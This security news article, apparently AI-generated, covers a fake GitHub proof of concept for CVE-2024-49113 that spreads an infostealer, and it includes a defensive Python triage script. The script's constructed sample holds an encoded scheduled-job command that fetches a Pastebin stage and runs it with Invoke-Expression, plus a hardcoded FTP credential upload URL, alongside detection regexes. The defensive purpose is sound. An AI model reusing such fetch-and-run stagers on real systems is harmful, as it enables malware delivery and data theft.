

Ethical Hacking News

A Deceptive Exploit on GitHub: A Cautionary Tale of Malicious PoCs



A GitHub repository posing as a proof-of-concept exploit for CVE-2024-49113 is spreading infostealer malware that exfiltrates sensitive data to an external FTP server. The tactic has been seen in several documented cases before, which shows how reliably it keeps working for malicious actors. To protect yourself, only trust reputable sources, and review code before executing it on your system.

  • Threat actors have published a fake proof-of-concept (PoC) exploit for CVE-2024-49113, a Windows LDAP vulnerability, as a lure to deliver infostealer malware.
  • The repository, disguised as a legitimate PoC project on GitHub, drops a payload that exfiltrates sensitive system data to an external FTP server.
  • The tactic is not new and has been seen in various documented cases of malicious tools masquerading as legitimate PoCs on GitHub.
  • Validating repository authenticity, reviewing code before execution, and checking binaries against VirusTotal are crucial steps to prevent such attacks.



  • Malicious actors have been using CVE-2024-49113, a vulnerability in the Windows Lightweight Directory Access Protocol (LDAP) client dubbed LDAPNightmare, as bait. A repository disguised as a proof-of-concept (PoC) exploit for the flaw has been spreading infostealer malware that exfiltrates sensitive data to an external FTP server.

    The tactic employed by the threat actors is not new and has been seen in various documented cases of malicious tools masquerading as legitimate PoCs on GitHub. The most recent incident was discovered by Trend Micro, and it highlights how persistently malicious actors return to this lure.

    According to Trend Micro, the malicious repository on GitHub appears to have been forked from SafeBreach Labs' legitimate PoC for CVE-2024-49113, published on January 1, 2025. The malicious project contains a UPX-packed executable, 'poc.exe', that, upon execution, drops a PowerShell script in the victim's %Temp% folder. A packed binary standing in for a PoC that was originally published as source code is itself a red flag: there is nothing to read before running it.

    The script then creates a scheduled job on the compromised system, which executes an encoded script that fetches a third script from Pastebin. Because the final stage is pulled from Pastebin at run time, the operators can swap the payload at any point without touching the repository. In the observed case it collects computer information, process lists, directory lists, the IP address, network adapter details and installed updates, packs them into a ZIP archive and uploads it to an external FTP server using hardcoded credentials.

    The theft of sensitive data is a stark reminder for users to exercise caution when sourcing public exploits for research or testing. Only trust cybersecurity firms and researchers with a good reputation, and review code before executing it on your system. Additionally, checking binaries against VirusTotal, by hash or by uploading them, before they are run can catch a known-bad sample early; it is not a substitute for reading the code.
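The checks described above can be scripted against a freshly cloned PoC repository before anything in it is executed. The following is an added example, not code from the article, Trend Micro or SafeBreach Labs: it hashes every file for a VirusTotal lookup by hash (no upload needed), flags PE files carrying the UPX marker, decodes PowerShell `-EncodedCommand` blobs and scans them too, and flags Pastebin fetches and hardcoded FTP credentials. The sample repository at the bottom is constructed for the demo (fake PE bytes, a stager in the style the article describes, a documentation-range IP); none of it is the real malware.

```python
"""Offline triage of a downloaded PoC repository before anything is run.

Added example. Traits looked for are the ones described in the article:
UPX-packed executable, encoded PowerShell, Pastebin fetch, hardcoded FTP
credentials. Hashes are printed for a VirusTotal lookup by hash.
"""
import base64
import hashlib
import re
from pathlib import Path

UPX_MARKER = b"UPX!"  # marker UPX leaves in the packed image's header area
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)
PASTEBIN_RE = re.compile(r"https?://(?:www\.)?pastebin\.com/(?:raw/)?\w+", re.I)
FTP_CRED_RE = re.compile(r"ftp://([^:/\s]+):([^@\s]+)@([^/\s]+)", re.I)


def sha256_hex(data: bytes) -> str:
    """SHA-256 of the file, suitable for a VirusTotal hash search."""
    return hashlib.sha256(data).hexdigest()


def is_upx_packed(data: bytes) -> bool:
    """True for a PE image ("MZ") with the UPX marker near the start."""
    return data[:2] == b"MZ" and UPX_MARKER in data[:4096]


def decode_encoded_command(blob: str) -> str:
    """PowerShell -EncodedCommand is base64 over UTF-16LE text."""
    try:
        return base64.b64decode(blob).decode("utf-16-le", errors="replace")
    except Exception:
        return ""


def triage_file(name: str, data: bytes) -> list[str]:
    """Return a list of suspicious traits found in one file."""
    findings = []
    if is_upx_packed(data):
        findings.append("upx-packed executable")
    text = data.decode("utf-8", errors="ignore")
    for m in ENCODED_RE.finditer(text):
        findings.append("encoded powershell command")
        # Scan the decoded script too, so an encoded loader that pulls its
        # next stage from Pastebin is still reported.
        decoded = decode_encoded_command(m.group(1))
        findings += [f"(decoded) {f}" for f in triage_file(name, decoded.encode())]
    if PASTEBIN_RE.search(text):
        findings.append("pastebin fetch")
    if FTP_CRED_RE.search(text):
        findings.append("hardcoded ftp credentials")
    return findings


def triage_repo(files: dict[str, bytes]) -> dict[str, dict]:
    """Triage an in-memory {relative path: bytes} view of a repository."""
    return {name: {"sha256": sha256_hex(data), "findings": triage_file(name, data)}
            for name, data in files.items()}


def triage_directory(path: str) -> dict[str, dict]:
    """Triage a cloned repository on disk."""
    root = Path(path)
    files = {str(p.relative_to(root)): p.read_bytes() for p in root.rglob("*") if p.is_file()}
    return triage_repo(files)


# Constructed sample repository (not real malware): a fake PE carrying the
# UPX marker, and a dropper that registers a scheduled job running an
# encoded command that fetches a second stage from Pastebin.
_stage2 = 'Invoke-WebRequest "https://pastebin.com/raw/EXAMPLE" | Invoke-Expression'
_stage2_b64 = base64.b64encode(_stage2.encode("utf-16-le")).decode()
SAMPLE_REPO = {
    "poc.exe": b"MZ" + b"\x00" * 60 + UPX_MARKER + b"\x00" * 100,
    "README.md": b"# PoC for CVE-2024-49113\nRun poc.exe against the target DC.\n",
    "stager.ps1": ("Register-ScheduledJob -Name Updater -ScriptBlock { powershell -EncodedCommand "
                   + _stage2_b64 + " }\n"
                   '$ftp = "ftp://user:s3cret@203.0.113.10/upload.zip"\n').encode(),
}

if __name__ == "__main__":
    for name, info in triage_repo(SAMPLE_REPO).items():
        print(f"{name:12} sha256={info['sha256'][:16]}... findings={info['findings'] or 'none'}")
```

Run it on a real clone with `triage_directory("/path/to/clone")`. The regexes are deliberately narrow and will miss obfuscation beyond a single `-EncodedCommand` layer; treat any hit as a reason to stop and read, and treat a clean report as no more than that.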

    Furthermore, threat actors have impersonated well-known security researchers in the past, so validating repository authenticity is also essential: check that the repository belongs to the account the researcher actually uses, and be wary of forks that add binaries the original never shipped. The recurrence of this tactic, documented again and again, is the reason to treat every public PoC as untrusted code until it has been read and, where possible, checked against other sources.

    In conclusion, the recent incident highlights the importance of vigilance in protecting against malicious PoCs and encourages users to take proactive steps to safeguard themselves against such threats.



    Related Information:

  • https://www.bleepingcomputer.com/news/security/fake-ldapnightmware-exploit-on-github-spreads-infostealer-malware/

  • https://nvd.nist.gov/vuln/detail/CVE-2024-49113

  • https://www.cvedetails.com/cve/CVE-2024-49113/


  • Published: Sat Jan 11 10:51:44 2025 by llama3.2 3B Q4_K_M



    © Ethical Hacking News . All rights reserved.
